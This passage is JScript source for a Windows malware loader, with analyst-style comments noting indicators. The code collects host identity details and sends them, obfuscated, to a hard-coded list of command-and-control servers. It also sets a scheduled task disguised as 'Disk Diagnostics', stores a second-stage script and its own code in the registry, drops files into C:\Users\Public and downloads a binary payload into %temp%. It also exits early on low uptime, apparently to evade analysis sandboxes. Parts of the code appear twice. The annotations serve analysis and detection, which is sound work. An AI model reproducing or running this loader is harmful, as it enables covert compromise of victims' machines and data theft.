  3000. DataTools.DeriveKey = function(keyStr){
  3001. var keyBase = DataTools.KEY_BASE;
  3002. var key = 0;
  3003.  
  3004. for(var i = 0; i < keyStr.length; i++){
  3005. keyBase = keyBase ^ keyStr.charCodeAt(i);
  3006. }
  3007.  
  3008. var _keyBase = keyBase.toString();
  3009. for(var i = 0; i < _keyBase.length; i++){
  3010. key += parseInt(_keyBase.charAt(i));
  3011. }
  3012.  
  3013. return key;
  3014. }
  3015.  
  // XORs each UTF-16 code unit with key; applying it twice with the same key restores the input.
  3016. DataTools.RotString = function(str, key){
  3017. var rotd = "";
  3018. for(var i = 0; i < str.length; i++){
  3019. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  3020. }
  3021.  
  3022. return rotd;
  3023. }
  3024.  
  // 32-bit multiplicative hash (seed 0xdeadbeef) returned as unpadded lowercase hex; basis of the host UID.
  3025. DataTools.Hash = function(str){
  3026. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
  3027. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  3028.  
  3029. return ((h ^ h >>> 16) >>> 0).toString(16);
  3030. }
  3031.  
  // Integer in [min, max] from Math.random (not cryptographic).
  3032. DataTools.Random = {};
  3033. DataTools.Random.Number = function(min, max){
  3034. min = Math.ceil(min);
  3035. max = Math.floor(max);
  3036. return Math.floor(Math.random() * (max - min + 1)) + min;
  3037. }
  3038.  
  // Random string of len lowercase letters; used for nonces, URL filler and the decoy file body.
  3039. DataTools.Random.String = function(len){
  3040. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  3041. var result = "";
  3042. for(var i = 0; i < len; i++){
  3043. var chr = DataTools.Random.Number(0, alphabet.length-1);
  3044. result = result.concat(alphabet.charAt(chr));
  3045. }
  3046.  
  3047. return result;
  3048. }
  3049.  
  3050.  
  // Replaces %key% placeholders in str from a "k=v&k=v" template string. String replace hits only the
  // first occurrence of each placeholder, and keys/values cannot themselves contain '&' or '='.
  3051. DataTools.Strings = {};
  3052. DataTools.Strings.ParseTemplate = function(str, templateStr){
  3053. var template = templateStr.split('&');
  3054. for(var i = 0; i < template.length; i++){
  3055. var keyValue = template[i].split('=');
  3056. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  3057. }
  3058.  
  3059. return str;
  3060. }
  3061.  
  // Thin wrappers around WScript.Shell and Scripting.FileSystemObject.
  3062. var Windows = {};
  3063. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
  3064. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
  3065.  
  // Runs a command line via WScript.Shell.Run (Loader.Persist uses it for schtasks).
  3066. Windows.Execute = function(command){
  3067. Windows.CoMainObject.Run(command);
  3068. }
  3069.  
  // Expands %VAR% environment references.
  3070. Windows.GetEnv = function(env){
  3071. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
  3072. }
  3073.  
  // Reads a value by full registry path.
  3074. Windows.RegRead = function(path){
  3075. return Windows.CoMainObject.RegRead(path);
  3076. }
  3077.  
  // Writes a value under GlobalStrings.REG_ROOT; entry is just the value name.
  3078. Windows.RegWrite = function(entry, value){
  3079. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
  3080. }
  3081.  
  // Creates a Unicode text file (CreateTextFile(path, overwrite, unicode)) holding 1024 random lowercase letters.
  3082. Windows.CreateFile = function(path){
  3083. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  3084. fHandle.WriteLine(DataTools.Random.String(1024));
  3085. fHandle.Close();
  3086. }
  3087.  
  // AppendDataStream / AppendDataStreamB / WriteDataStreamBytes target an NTFS alternate data stream
  // ("path:stream"). None is called in the visible script; ADS creation is still worth monitoring.
  3088. Windows.AppendDataStream = function(path, stream, data){
  3089. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  3090. fHandle.WriteLine(data);
  3091. fHandle.Close();
  3092. }
  3093.  
  3094. Windows.AppendDataStreamB = function(path, stream, data){
  3095. data.SaveToFile(path.concat(":").concat(stream), 2);
  3096. data.Close();
  3097. }
  3098.  
  // Overwrites path with text.
  3099. Windows.WriteData = function(path, data){
  3100. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  3101. fHandle.Write(data);
  3102. fHandle.Close();
  3103. }
  3104.  
  // Saves an ADODB.Stream to path (2 = create/overwrite) and closes it.
  3105. Windows.WriteBytes = function(path, data){
  3106. data.SaveToFile(path, 2);
  3107. data.Close();
  3108. }
  3109.  
  3110. Windows.WriteDataStreamBytes = function(path, stream, data){
  3111. data.SaveToFile(path.concat(":").concat(stream), 2);
  3112. data.Close();
  3113. }
  3114.  
  // Reads a whole text file (1 = ForReading); the handle is never closed.
  3115. Windows.ReadFile = function(path){
  3116. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  3117. return fHandle.ReadAll();
  3118. }
  3119.  
  // WMI moniker for the named machine ("." = local).
  3120. Windows.GetWMIProvider = function(pcname){
  3121. return GetObject("winmgmts:"+
  3122. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
  3123. }
  3124.  
  // System uptime in seconds from Win32_PerfFormattedData_PerfOS_System; returns 0 if WMI fails,
  // which the caller (Loader.DeployClient) treats the same as a short uptime.
  3125. Windows.GetUptime = function(){
  3126. try{
  3127. var wmi = Windows.GetWMIProvider(".");
  3128. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  3129. var e = new Enumerator(queryResult);
  3130.  
  3131. return parseInt(e.item().SystemUpTime);
  3132. }catch(e){
  3133. return 0;
  3134. }
  3135. }
  3136.  
  // Reports "32" only when ProductName contains 'Windows 7', otherwise "64"; keyed on the product
  // name rather than real bitness. Sent to the C2 as the 'rtag' parameter.
  3137. Windows.GetArch = function(){
  3138. var architecture = "64";
  3139. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  3140.  
  3141. if(product.indexOf('Windows 7') != -1){
  3142. architecture = "32";
  3143. }
  3144.  
  3145. return architecture;
  3146. }
  3147.  
  3148.  
  // Synchronous HTTP GET via MSXML2.XMLHTTP. Returns the body only on HTTP 200; any other status
  // or a thrown error yields "". No timeout is set, and every configured C2 is plain http.
  3149. var Http = {};
  3150. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
  3151. Http.Request = function(url){
  3152. try{
  3153. Http.Client.Open('GET', url, false);
  3154. Http.Client.Send();
  3155.  
  3156. if(Http.Client.Status == 200)
  3157. return Http.Client.ResponseText;
  3158. else
  3159. return "";
  3160. }catch(e){
  3161. return ""
  3162. }
  3163. }
  3164.  
  3165.  
  // Host profile and beaconing logic. The environment values below are captured once at load time.
  3166. var Loader = {};
  3167. Loader.USERNAME = Windows.GetEnv("%username%");
  3168. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
  3169. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
  3170. Loader.Uptime = Windows.GetUptime();
  // "true" when the computer name differs from the user domain; looks like a domain-joined indicator - not confirmable here.
  3171. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
  3172.  
  // Host identifier: hex hash of the profile fields with the build number appended as text
  // (Hash returns a string, so '+' concatenates). Persisted as the SetupServiceKey registry value.
  3173. Loader.GetUid = function(){
  3174. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
  3175. }
  3176.  
  // Registration payload: colon-joined profile, XORed with a key derived from nonce + C2_OB_KEY,
  // then base64 and URL encoded. The nonce itself travels in the clear as the 'ubwG' parameter.
  3177. Loader.GetInitialRequest = function(nonce){
  3178. var uid = Loader.GetUid();
  3179. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  3180.  
  3181. var sessionKey = nonce + config.C2_OB_KEY;
  3182. request = request.join(":");
  3183. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  3184. request = Base64Encode(request);
  3185.  
  3186. return encodeURIComponent(request);
  3187. }
  3188.  
  // Beacon path: fixed query names (winrm, view2, regclid, client, service_id, ubwG) around random
  // filler; the constant parts are a usable network signature.
  3189. Loader.GetInitialEndpoint = function(){
  3190. var nonce = DataTools.Random.String(12)
  3191. var request = Loader.GetInitialRequest(nonce);
  3192.  
  3193. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  3194. return endpoint;
  3195. }
  3196.  
  // Fetches the next payload from the selected C2 (/go.aspx), decodes it with a key derived from the
  // UID, and drops it as %temp%\<uid>.bin. An empty HTTP response still produces an (empty) file.
  3197. Loader.DeployHost = function(){
  3198. var temp = Windows.GetEnv("%temp%");
  3199. var architecture = Windows.GetArch();
  3200. var nonce = DataTools.Random.String(12);
  3201. var uid = Loader.GetUid();
  3202. var sessionKey = nonce + config.C2_OB_KEY;
  3203.  
  3204. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  3205. encodedId = Base64Encode(encodedId);
  3206. encodedId = encodeURIComponent(encodedId);
  3207.  
  3208. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  3209. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  3210.  
  3211. var filename = uid.concat(".bin");
  3212.  
  3213. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  3214. return temp.concat("\\").concat(filename);
  3215.  
  3216. }
  3217.  
  // Main registration loop. Exits when uptime is <= 3000 seconds (GetUptime also returns 0 on WMI
  // failure, so that case exits too). Tries every host C2_FAIL_COUNT times, sleeping C2_REQUEST_SLEEP
  // seconds after each attempt; errors are swallowed. A response carrying the '<<<CLIENT__' marker is
  // base64-decoded, the answering host and the UID are written to the registry (ShimV4, SetupServiceKey),
  // and Persist is called.
  3218. Loader.DeployClient = function() {
  3219. if (Loader.Uptime <= 3000) {
  3220. WScript.Quit(0);
  3221. }
  3222.  
  3223. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
  3224. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
  3225. try {
  3226. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
  3227. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
  3228.  
  3229. if (response.indexOf('<<<CLIENT__') !== -1) {
  3230. var client = response.replace('<<<CLIENT__', '');
  3231. client = Base64text(client);
  3232.  
  3233. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
  3234. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
  3235.  
  3236. SELECTED_C2 = config.PRIMARY_C2[j];
  3237. Loader.Persist(client);
  3238. return;
  3239.  
  3240. }
  3241. } catch (e) {
  3242.  
  3243. }
  3244.  
  3245. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
  3246. }
  3247. }
  3248. }
  3249.  
  // Persistence and staging: registers a scheduled task that runs every 6 minutes, stores the decoded
  // second stage (ServerUrl) and a copy of this script's own source (WebLib32) in the registry, drops
  // the decoy .ini and the stage-2 .js into C:\Users\Public, then fetches the binary payload via DeployHost.
  3250. Loader.Persist = function(client){
  3251.  
  3252. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  3253. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  3254.  
  3255. Windows.Execute(taskCommand);
  3256. Windows.RegWrite("ServerUrl", client);
  3257. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  3258.  
  3259. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  3260.  
  3261. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  3262.  
  3263. Loader.DeployHost();
  3264. }
  3265.  
  // Message box via WScript.Shell.Popup; not called anywhere in the visible script.
  3266. function debug(message){
  3267. ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
  3268. }
  3269.  
  3270.  
  // Decodes a base64 string to UTF-8 text (MSXML bin.base64 -> ADODB.Stream). The stream is left open.
  3271. function Base64text(string){
  3272. var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  3273. var element = XmlDOM.createElement("tempContainer");
  3274. element.dataType = "bin.Base64";
  3275. element.text = string;
  3276.  
  3277. var stream = WScript.CreateObject("ADODB.Stream");
  3278. stream.Type = 1;
  3279. stream.Open();
  3280. stream.Write(element.nodeTypedValue);
  3281.  
  3282. stream.Position = 0;
  3283. stream.Type = 2;
  3284. stream.CharSet = "utf-8";
  3285.  
  3286. return stream.ReadText();
  3287. }
  3288.  
  // Converts text to a byte array through an "ascii" ADODB.Stream (type 2 = text, then 1 = binary).
  // Non-ASCII characters presumably do not survive that charset - not confirmable here. Stream left open.
  3289. function StringToBinary(string){
  3290. var BinaryStream = new ActiveXObject("ADODB.Stream");
  3291. BinaryStream.Type = 2;
  3292. BinaryStream.CharSet = "ascii";
  3293. BinaryStream.Open();
  3294. BinaryStream.WriteText(string);
  3295. BinaryStream.Position = 0;
  3296. BinaryStream.Type = 1;
  3297. BinaryStream.Position = 0;
  3298. return BinaryStream.Read();
  3299. }
  3300.  
  3301.  
  // Decodes base64 into an open binary ADODB.Stream; the caller (Windows.WriteBytes) saves and closes it.
  3302. function Base64bytes(string){
  3303. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  3304. var element = XmlDOM.createElement("Base64Data");
  3305. element.dataType = "bin.base64";
  3306.  
  3307. element.text = string;
  3308.  
  3309. var stream = WScript.CreateObject("ADODB.Stream");
  3310. stream.Type = 1;
  3311. stream.Open();
  3312.  
  3313. stream.Write(element.nodeTypedValue);
  3314. return stream;
  3315. }
  3316.  
  // Base64-encodes text via MSXML. Strips the line breaks the encoder inserts and also removes every
  // "//" sequence, which alters any output that legitimately contains two adjacent '/' characters.
  3317. function Base64Encode(string) {
  3318.  
  3319. var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  3320. var element = XmlDOM.createElement("Base64Data");
  3321. element.dataType = "bin.base64";
  3322.  
  3323. element.nodeTypedValue = StringToBinary(string);
  3324.  
  3325. return element.text.replace(/\n/g, "").replace(/\/\//g, "");
  3326. }
  3327.  
  3328.  
  // Entry point: runs the registration flow only when CLIENT_IMPORT_ENV has not been defined by a
  // caller, i.e. when this script is executed directly rather than evaluated as a library.
  3329. if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  3330. Loader.DeployClient();
  3331. }
  // Loader configuration read by the Loader/DataTools code below.
  //   PRIMARY_C2       : ordered list of C2 hosts; DeployClient tries them in order.
  //   SOFT_SIG/VERSION : campaign tag and build number sent in every beacon and folded into the host UID.
  //   C2_REQUEST_SLEEP : seconds slept after each beacon attempt that did not succeed.
  //   C2_FAIL_COUNT    : number of passes over the host list before giving up.
  //   C2_OB_KEY        : static secret mixed into DataTools.DeriveKey for request/response obfuscation.
  //   C2_PREFIX        : path component of the beacon URL.
  // C2_FAIL_SLEEP is not referenced anywhere in the visible script.
  // All hosts are plain http://, so the beacon URL and its parameters are visible on the wire.
  3332. var config = {
  3333. PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  3334. SOFT_SIG : 'mad29',
  3335. SOFT_VERSION: 32,
  3336. C2_REQUEST_SLEEP : 21,
  3337. C2_FAIL_SLEEP : 21,
  3338. C2_FAIL_COUNT : 20,
  3339. C2_OB_KEY : 'JxTRG4mY',
  3340.  
  3341.  
  3342. C2_PREFIX : 'rpc.aspx'
  3343. }
  3344.  
  3345.  
  // Active C2 host: starts as the first list entry and is overwritten by Loader.DeployClient with whichever host answered.
  3346. var SELECTED_C2 = config.PRIMARY_C2[0];
  3347.  
  3348.  
  // Polyfill for 32-bit integer multiplication (not available in legacy JScript).
  // The only consumer in this script is DataTools.Hash.
  3349. Math.imul = function (a, b) {
  3350. var ah = (a >>> 16) & 0xffff;
  3351. var al = a & 0xffff;
  3352. var bh = (b >>> 16) & 0xffff;
  3353. var bl = b & 0xffff;
  3354. return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
  3355. };
  3356.  
  3357.  
  // Static strings used for persistence and file drops; useful host-based indicators:
  //   REG_ROOT         : every Windows.RegWrite lands under this HKCU key.
  //   TASK_LOOP_CREATE : schtasks template filled by Loader.Persist (task "Disk Diagnostics", every 6 minutes).
  //   PERSIST_COMMAND  : what the task runs - explorer.exe opening a .js in C:\Users\Public.
  //   NTFILE_PATH      : decoy file filled with random text by Windows.CreateFile.
  // WMIC_EXEC_ARGS, WMIC_EXEC, TASK_CREATE and ADS_SSID are not referenced in the visible script;
  // presumably consumed by the second-stage code this loader fetches - not confirmable here.
  3358. var GlobalStrings = {
  3359. REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",
  3360. WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",
  3361. WMIC_EXEC : "wmic process call create \"%path%\"",
  3362. TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",
  3363. TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",
  3364. NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",
  3365. ADS_SSID : "HDDScan",
  3366. PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",
  3367. TASK_NAME : "Disk Diagnostics"
  3368. }
  3369.  
  3370.  
  // Small factory over ActiveXObject keyed by symbolic name. Only MAIN_SH_OBJECT, FS_DRIVE_OBJECT and
  // HTTP_CLIENT_OBJECT are requested through GetInstance in the visible script; the stream/XML helpers
  // further down instantiate their COM objects directly.
  3371. var ObjectProducer = {}
  3372. ObjectProducer.AccesibleObjects = {
  3373. MAIN_SH_OBJECT : 'WScript.Shell',
  3374. STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  3375. XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  3376. XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  3377. HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  3378. FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
  3379. };
  3380.  
  // Returns the ActiveXObject constructor itself; the extra hop has no visible effect beyond indirection.
  3381. ObjectProducer.GetRootConstructor = function(){
  3382. return ActiveXObject;
  3383. }
  3384.  
  // Instantiates the COM object whose ProgID is registered under instanceKey.
  3385. ObjectProducer.GetInstance = function(instanceKey){
  3386. var rootConstructor = ObjectProducer.GetRootConstructor();
  3387. return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
  3388. }
  3389.  
  3390.  
  3391.  
  // Obfuscation and helper routines.
  3392. var DataTools = {};
  3393. DataTools.KEY_BASE = 1029;
  3394.  
  // XOR-folds every char code into KEY_BASE, then sums the decimal digits of the result.
  // The returned key is therefore always a small non-negative integer.
  3395. DataTools.DeriveKey = function(keyStr){
  3396. var keyBase = DataTools.KEY_BASE;
  3397. var key = 0;
  3398.  
  3399. for(var i = 0; i < keyStr.length; i++){
  3400. keyBase = keyBase ^ keyStr.charCodeAt(i);
  3401. }
  3402.  
  3403. var _keyBase = keyBase.toString();
  3404. for(var i = 0; i < _keyBase.length; i++){
  3405. key += parseInt(_keyBase.charAt(i));
  3406. }
  3407.  
  3408. return key;
  3409. }
  3410.  
  // XORs each UTF-16 code unit with key; applying it twice with the same key restores the input.
  3411. DataTools.RotString = function(str, key){
  3412. var rotd = "";
  3413. for(var i = 0; i < str.length; i++){
  3414. rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  3415. }
  3416.  
  3417. return rotd;
  3418. }
  3419.  
  // 32-bit multiplicative hash (seed 0xdeadbeef) returned as unpadded lowercase hex; basis of the host UID.
  3420. DataTools.Hash = function(str){
  3421. for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
  3422. h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  3423.  
  3424. return ((h ^ h >>> 16) >>> 0).toString(16);
  3425. }
  3426.  
  // Integer in [min, max] from Math.random (not cryptographic).
  3427. DataTools.Random = {};
  3428. DataTools.Random.Number = function(min, max){
  3429. min = Math.ceil(min);
  3430. max = Math.floor(max);
  3431. return Math.floor(Math.random() * (max - min + 1)) + min;
  3432. }
  3433.  
  // Random string of len lowercase letters; used for nonces, URL filler and the decoy file body.
  3434. DataTools.Random.String = function(len){
  3435. var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  3436. var result = "";
  3437. for(var i = 0; i < len; i++){
  3438. var chr = DataTools.Random.Number(0, alphabet.length-1);
  3439. result = result.concat(alphabet.charAt(chr));
  3440. }
  3441.  
  3442. return result;
  3443. }
  3444.  
  3445.  
  // Replaces %key% placeholders in str from a "k=v&k=v" template string. String replace hits only the
  // first occurrence of each placeholder, and keys/values cannot themselves contain '&' or '='.
  3446. DataTools.Strings = {};
  3447. DataTools.Strings.ParseTemplate = function(str, templateStr){
  3448. var template = templateStr.split('&');
  3449. for(var i = 0; i < template.length; i++){
  3450. var keyValue = template[i].split('=');
  3451. str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  3452. }
  3453.  
  3454. return str;
  3455. }
  3456.  
  // Thin wrappers around WScript.Shell and Scripting.FileSystemObject.
  3457. var Windows = {};
  3458. Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
  3459. Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
  3460.  
  // Runs a command line via WScript.Shell.Run (Loader.Persist uses it for schtasks).
  3461. Windows.Execute = function(command){
  3462. Windows.CoMainObject.Run(command);
  3463. }
  3464.  
  // Expands %VAR% environment references.
  3465. Windows.GetEnv = function(env){
  3466. return Windows.CoMainObject.ExpandEnvironmentStrings(env);
  3467. }
  3468.  
  // Reads a value by full registry path.
  3469. Windows.RegRead = function(path){
  3470. return Windows.CoMainObject.RegRead(path);
  3471. }
  3472.  
  // Writes a value under GlobalStrings.REG_ROOT; entry is just the value name.
  3473. Windows.RegWrite = function(entry, value){
  3474. Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
  3475. }
  3476.  
  // Creates a Unicode text file (CreateTextFile(path, overwrite, unicode)) holding 1024 random lowercase letters.
  3477. Windows.CreateFile = function(path){
  3478. var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  3479. fHandle.WriteLine(DataTools.Random.String(1024));
  3480. fHandle.Close();
  3481. }
  3482.  
  // AppendDataStream / AppendDataStreamB / WriteDataStreamBytes target an NTFS alternate data stream
  // ("path:stream"). None is called in the visible script; ADS creation is still worth monitoring.
  3483. Windows.AppendDataStream = function(path, stream, data){
  3484. var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  3485. fHandle.WriteLine(data);
  3486. fHandle.Close();
  3487. }
  3488.  
  3489. Windows.AppendDataStreamB = function(path, stream, data){
  3490. data.SaveToFile(path.concat(":").concat(stream), 2);
  3491. data.Close();
  3492. }
  3493.  
  // Overwrites path with text.
  3494. Windows.WriteData = function(path, data){
  3495. var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  3496. fHandle.Write(data);
  3497. fHandle.Close();
  3498. }
  3499.  
  // Saves an ADODB.Stream to path (2 = create/overwrite) and closes it.
  3500. Windows.WriteBytes = function(path, data){
  3501. data.SaveToFile(path, 2);
  3502. data.Close();
  3503. }
  3504.  
  3505. Windows.WriteDataStreamBytes = function(path, stream, data){
  3506. data.SaveToFile(path.concat(":").concat(stream), 2);
  3507. data.Close();
  3508. }
  3509.  
  // Reads a whole text file (1 = ForReading); the handle is never closed.
  3510. Windows.ReadFile = function(path){
  3511. var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  3512. return fHandle.ReadAll();
  3513. }
  3514.  
  // WMI moniker for the named machine ("." = local).
  3515. Windows.GetWMIProvider = function(pcname){
  3516. return GetObject("winmgmts:"+
  3517. "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
  3518. }
  3519.  
  // System uptime in seconds from Win32_PerfFormattedData_PerfOS_System; returns 0 if WMI fails,
  // which the caller (Loader.DeployClient) treats the same as a short uptime.
  3520. Windows.GetUptime = function(){
  3521. try{
  3522. var wmi = Windows.GetWMIProvider(".");
  3523. var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
  3524. var e = new Enumerator(queryResult);
  3525.  
  3526. return parseInt(e.item().SystemUpTime);
  3527. }catch(e){
  3528. return 0;
  3529. }
  3530. }
  3531.  
  // Reports "32" only when ProductName contains 'Windows 7', otherwise "64"; keyed on the product
  // name rather than real bitness. Sent to the C2 as the 'rtag' parameter.
  3532. Windows.GetArch = function(){
  3533. var architecture = "64";
  3534. var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  3535.  
  3536. if(product.indexOf('Windows 7') != -1){
  3537. architecture = "32";
  3538. }
  3539.  
  3540. return architecture;
  3541. }
  3542.  
  3543.  
  // Synchronous HTTP GET via MSXML2.XMLHTTP. Returns the body only on HTTP 200; any other status
  // or a thrown error yields "". No timeout is set, and every configured C2 is plain http.
  3544. var Http = {};
  3545. Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
  3546. Http.Request = function(url){
  3547. try{
  3548. Http.Client.Open('GET', url, false);
  3549. Http.Client.Send();
  3550.  
  3551. if(Http.Client.Status == 200)
  3552. return Http.Client.ResponseText;
  3553. else
  3554. return "";
  3555. }catch(e){
  3556. return ""
  3557. }
  3558. }
  3559.  
  3560.  
  // Host profile and beaconing logic. The environment values below are captured once at load time.
  3561. var Loader = {};
  3562. Loader.USERNAME = Windows.GetEnv("%username%");
  3563. Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
  3564. Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
  3565. Loader.Uptime = Windows.GetUptime();
  // "true" when the computer name differs from the user domain; looks like a domain-joined indicator - not confirmable here.
  3566. Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
  3567.  
  // Host identifier: hex hash of the profile fields with the build number appended as text
  // (Hash returns a string, so '+' concatenates). Persisted as the SetupServiceKey registry value.
  3568. Loader.GetUid = function(){
  3569. return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
  3570. }
  3571.  
  // Registration payload: colon-joined profile, XORed with a key derived from nonce + C2_OB_KEY,
  // then base64 and URL encoded. The nonce itself travels in the clear as the 'ubwG' parameter.
  3572. Loader.GetInitialRequest = function(nonce){
  3573. var uid = Loader.GetUid();
  3574. var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  3575.  
  3576. var sessionKey = nonce + config.C2_OB_KEY;
  3577. request = request.join(":");
  3578. request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  3579. request = Base64Encode(request);
  3580.  
  3581. return encodeURIComponent(request);
  3582. }
  3583.  
  // Beacon path: fixed query names (winrm, view2, regclid, client, service_id, ubwG) around random
  // filler; the constant parts are a usable network signature.
  3584. Loader.GetInitialEndpoint = function(){
  3585. var nonce = DataTools.Random.String(12)
  3586. var request = Loader.GetInitialRequest(nonce);
  3587.  
  3588. var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic&regclid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  3589. return endpoint;
  3590. }
  3591.  
  // Fetches the next payload from the selected C2 (/go.aspx), decodes it with a key derived from the
  // UID, and drops it as %temp%\<uid>.bin. An empty HTTP response still produces an (empty) file.
  3592. Loader.DeployHost = function(){
  3593. var temp = Windows.GetEnv("%temp%");
  3594. var architecture = Windows.GetArch();
  3595. var nonce = DataTools.Random.String(12);
  3596. var uid = Loader.GetUid();
  3597. var sessionKey = nonce + config.C2_OB_KEY;
  3598.  
  3599. var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  3600. encodedId = Base64Encode(encodedId);
  3601. encodedId = encodeURIComponent(encodedId);
  3602.  
  3603. var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  3604. pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  3605.  
  3606. var filename = uid.concat(".bin");
  3607.  
  3608. Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  3609. return temp.concat("\\").concat(filename);
  3610.  
  3611. }
  3612.  
